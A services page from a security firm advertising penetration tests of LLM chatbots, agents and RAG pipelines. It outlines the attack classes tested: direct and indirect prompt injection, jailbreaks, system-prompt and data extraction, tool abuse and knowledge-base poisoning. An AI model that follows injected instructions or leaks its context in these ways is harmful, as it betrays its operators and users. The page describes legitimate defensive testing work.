Pentest LLM
Your LLM applications open an attack surface that your usual tests do not cover.
We test your chatbots, assistants, agents and RAG pipelines the way an attacker would: prompt injection, guardrail bypass, system-prompt and context-data leakage, abuse of the tools exposed to an agent. Every scenario is replayed by hand and documented with a prioritised remediation plan.
France Cybersecurity Label The LLM attack surface
An LLM application blends user input, external data and automated actions
A language model does not separate instruction from data: anything that enters its context (a user message, a RAG document, a web page fetched by a tool) can be read as a command. As soon as an assistant can call functions, query a database or trigger an action, a hostile input becomes an execution vector. We assess this surface following the OWASP Top 10 for LLM Applications, against your real application and its integration, not just the underlying model.
What we test
Four classes of flaws specific to LLM applications
Prompt injection and guardrail bypass
Direct injection through user messages and indirect injection through the sources the model ingests (RAG documents, web pages, e-mails). We test jailbreaks and instruction hijacking to push the model outside its intended role.
Data and system-prompt leakage
Extraction of the system prompt and its rules, of context or training data, and of information belonging to other users or tenants. We check session and tenant isolation and that secrets placed in the context are not disclosed.
Insecure output handling
A model response inserted into your application without validation can trigger XSS, SSRF or server-side code execution. We test the chain between a manipulated output and the code that consumes it (HTML rendering, API call, generated query).
Excessive agency and RAG-chain poisoning
Abuse of the tools and functions exposed to an agent (over-broad permissions, unconfirmed actions) and poisoning of the knowledge base to steer answers or exfiltrate data through the RAG chain. We check the real limits of what a compromised agent can trigger.
Frequently asked questions
What to know before an LLM pentest
How does an LLM pentest differ from an automated scan?
A scanner flags known patterns but does not reason about application context. Most LLM flaws come from the chain between a manipulated input, the ingested data and the actions the model can trigger. We build and replay those scenarios by hand, adapting each payload to the observed behaviour of your application.
What do we need to provide to scope the engagement?
Access to the application and its test accounts, a description of the tools and functions exposed to the agent, and the nature of the sources feeding the RAG. Access to the system prompt and the architecture (grey-box mode) speeds up the analysis, but we can also work black-box depending on your needs. The exact scope is agreed during initial scoping.
What is the deliverable and how long does the engagement take?
You receive a report detailing each vulnerability, its replayable proof of concept, its business impact and a prioritised remediation, followed by a debrief meeting. A standard LLM application test usually runs between 5 and 10 working days depending on the number of functions, agents and RAG sources in scope.
Other domains
Explore our other penetration tests
Pentest Web
Your web apps and APIs carry business logic that an automated scanner cannot probe.
Pentest Mobile
Find the flaws in your iOS and Android app before an attacker exploits them.
Pentest IoT
Before you ship, find out what an attacker can do with your connected device.
Pentest Cloud
One over-permissive IAM role or an open bucket is enough to compromise your whole cloud.
Penetration testing overviewDoes your AI application do what you think, and nothing else?
Tell us about your LLM application and its scope, and we will send a tailored quote within 48h.